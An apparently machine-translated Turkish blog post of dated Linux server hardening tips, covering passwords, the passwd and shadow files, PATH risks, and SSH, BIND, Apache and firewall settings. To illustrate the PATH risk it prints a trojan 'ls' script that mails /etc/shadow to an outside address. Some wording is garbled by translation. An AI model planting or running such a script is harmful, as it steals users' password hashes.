Linux (Sunucunuz) İçin Güvenlik İpuçları (Bölüm 1)

@Jlcmux

5 minutos

Uzun süredir blogda hiçbir şey yayınlamadım ve bir kitaptan bazı ipuçlarını paylaşmak istiyorum (Diğerlerinin yanı sıra). Onu üniversitede buldum ve yeni okudum ve dürüst olmak gerekirse biraz modası geçmiş olmasına ve sistemin evrimi göz önüne alındığında gösterilen tekniklerin işe yaraması pek olası olmasa da, gösterilebilecek ilginç yönler de bunlar. 9788448140502

Orta veya belki de büyük ölçekte sunucu olarak kullanılan bir Linux sistemine yönelik tavsiye odaklı olduklarını açıklığa kavuşturmak istiyorum, çünkü masaüstü kullanıcı düzeyinde, uygulanabilir olsa da, çok yararlı olmayacaktır.

Ayrıca, bunların basit hızlı ipuçları olduğunu ve belirli bir konuda çok daha spesifik ve kapsamlı başka bir gönderi yapmayı planlamama rağmen fazla ayrıntıya girmeyeceğimi de not ediyorum. Ama bunu daha sonra göreceğim. Başlayalım.

Parola politikaları. 

Bir slogan gibi görünse de, iyi bir parola politikasına sahip olmak, savunmasız bir sistem olup olmaması arasındaki farkı yaratır. "Kaba kuvvet" gibi saldırılar, bir sisteme erişmek için kötü bir şifreye sahip olmanın avantajını kullanır. En yaygın ipuçları:

  • Büyük ve küçük harfleri birleştirin.
  • Özel karakterler kullanın.
  • Sayılar.
  • 6 basamaktan fazla (umarız 8'den fazla).

Buna ek olarak, iki temel dosyayı ele alalım.  / etc / passwd ve / etc / shadow.

Çok önemli bir şey, dosyanın / etc / passwd. Bize kullanıcının adını, kullanıcı kimliğini, klasör yolunu, bash .. vb. Vermenin yanı sıra. bazı durumlarda kullanıcının şifrelenmiş anahtarını da gösterir.

 Tipik kompozisyonuna bakalım.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user: cryptkey: uid: gid: yol :: yol: bash

Buradaki asıl sorun, bu belirli dosyanın izinlere sahip olmasıdır. -rw-r - r– bu, sistemin herhangi bir kullanıcısı tarafından okuma izinlerine sahip olduğu anlamına gelir. ve şifrelenmiş anahtara sahip olmak, gerçek olanı deşifre etmek çok zor değildir.

Dosya bu yüzden var / etc / shadow. Bu, diğer şeylerin yanı sıra tüm kullanıcı anahtarlarının saklandığı dosyadır. Bu dosya, hiçbir kullanıcının okuyamayacağı şekilde gerekli izinlere sahiptir.

Bunu düzeltmek için dosyaya gitmeliyiz / Etc / passwd ve şifrelenmiş anahtarı "x" olarak değiştirin, bu yalnızca anahtarı dosyamıza kaydeder / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH ve .bashrc ve diğerleri ile ilgili sorunlar.

Bir kullanıcı konsolunda bir komut yürüttüğünde, kabuk bu komutu PATH ortam değişkeninde bulunan bir dizin listesinde arar.

Konsolda "echo $ PATH" yazarsanız, bunun gibi bir çıktı verecektir.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Bu klasörlerin her biri, kabuğun onu yürütmek için yazılan komutu arayacağı yerdir. O "." bu, aranacak ilk klasörün, komutun yürütüldüğü klasörle aynı olduğu anlamına gelir.

Farz edin ki bir "Carlos" kullanıcısı var ve bu kullanıcı "kötülük yapmak" istiyor. Bu kullanıcı ana klasöründe "ls" adlı bir dosya bırakabilir ve bu dosyada aşağıdaki gibi bir komut çalıştırabilir:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Ve hedefle ilgili şeyler için kök kullanıcı, carlos klasörünün içindeki klasörleri listelemeye çalışırsa (ilk önce aynı klasördeki komutu aradığından, yanlışlıkla dosyayı şifrelerle birlikte bu e-postaya ve sonra klasörleri gönderecektir. listelenecek ve çok geç olana kadar öğrenemeyecekti.

Bundan kaçınmak için "." PATH değişkeninin.

Aynı şekilde, /.bashrc, /.bashrc_profile, ./.login gibi dosyalar denetlenmeli ve "." Olup olmadığını kontrol etmelidir. PATH değişkeninde ve aslında bunun gibi dosyalardan belirli bir komutun hedefini değiştirebilirsiniz.

Hizmetlerle ilgili ipuçları:

SHH

  • Sshd_config dosyasında ssh protokolünün 1. sürümünü devre dışı bırakın.
  • Kök kullanıcının ssh ile oturum açmasına izin vermeyin.
  • Ssh_host_key, ssh_host_dsa_key ve ssh_host_rsa_key dosya ve klasörleri yalnızca kök kullanıcı tarafından okunmalıdır.

BIND

  • Name.conf dosyasındaki hoş geldiniz mesajını sürüm numarasını göstermeyecek şekilde değiştirin.
  • Bölge transferlerini sınırlayın ve yalnızca ihtiyacı olan ekipler için etkinleştirin.

Apache

  • Hizmetin hoş geldiniz mesajında ​​sürümünüzü göstermesini engelleyin. Httpd.conf dosyasını düzenleyin ve satırları ekleyin veya değiştirin:  

ServerSignature Off
ServerTokens Prod

  • Otomatik indekslemeyi devre dışı bırakın
  • Apache'yi .htacces, * .inc, * .jsp .. vb. Gibi hassas dosyalar sunmayacak şekilde yapılandırın.
  • Man sayfalarını veya örneği hizmetten kaldırın
  • Apache'yi chroot edilmiş bir ortamda çalıştırın

Ağ güvenliği.

Harici ağdan sisteminize olası tüm girişleri kapatmak önemlidir, burada davetsiz misafirlerin ağınızdan bilgi taramasını ve bilgi almasını önlemek için bazı önemli ipuçları verilmiştir.

ICMP trafiğini engelle

Güvenlik duvarı, her türden gelen ve giden ICMP trafiğini ve yankı yanıtlarını engelleyecek şekilde yapılandırılmalıdır. Bununla, örneğin, çeşitli ip aralığında canlı ekipman arayan bir tarayıcının sizi bulmasını önlersiniz. 

TCP ping taramasından kaçının.

Sisteminizi taramanın bir yolu TCP ping taramasıdır. Sunucunuzda 80 numaralı bağlantı noktasında bir Apache sunucusu olduğunu varsayalım. İzinsiz giren kişi bu bağlantı noktasına bir ACK isteği gönderebilir, bununla sistem yanıt verirse bilgisayar canlı olacak ve diğer bağlantı noktalarını tarayacaktır.

Bunun için, güvenlik duvarınızın her zaman "durum farkındalığı" seçeneğine sahip olması ve önceden kurulmuş bir TCP bağlantısına veya oturumuna karşılık gelmeyen tüm ACK paketlerini atması gerekir.

Bazı ek ipuçları:

  • Ağınıza yapılan bağlantı noktası taramalarını algılamak için IDS sistemlerini kullanın.
  • Güvenlik Duvarını, bağlantı kaynağı bağlantı noktası ayarlarına güvenmeyecek şekilde yapılandırın.

Bunun nedeni, bazı taramaların 20 veya 53 gibi "sahte" bir kaynak bağlantı noktası kullanmasıdır, çünkü çoğu sistem bu bağlantı noktalarına güvenir çünkü bunlar bir ftp veya DNS için tipiktir.

NOT: Bu yazıda belirtilen sorunların çoğunun hemen hemen tüm mevcut dağıtımlarda çözüldüğünü unutmayın. Ancak bu sorunlar hakkında önemli bilgilere sahip olmak asla zarar vermez, böylece başınıza gelmesinler.

NOT: Daha sonra belirli bir konu göreceğim ve çok daha detaylı ve güncel bilgiler içeren bir gönderi yapacağım.

Herkesi okuduğu için tehdit ediyor.

Selamlar.


Yorumunuzu bırakın

E-posta hesabınız yayınlanmayacak. Gerekli alanlar ile işaretlenmiştir *

*

*

  1. Verilerden sorumlu: Miguel Ángel Gatón
  2. Verilerin amacı: Kontrol SPAM, yorum yönetimi.
  3. Meşruiyet: Onayınız
  4. Verilerin iletilmesi: Veriler, yasal zorunluluk dışında üçüncü kişilere iletilmeyecektir.
  5. Veri depolama: Occentus Networks (AB) tarafından barındırılan veritabanı
  6. Haklar: Bilgilerinizi istediğiniz zaman sınırlayabilir, kurtarabilir ve silebilirsiniz.

  1.   bilgisayar uzmanı dijo
    önce 8 yıl

    Makaleyi gerçekten beğendim ve konuyla ilgileniyorum, içerik yüklemeye devam etmenizi tavsiye ediyorum.

    Informatico'ya yanıt ver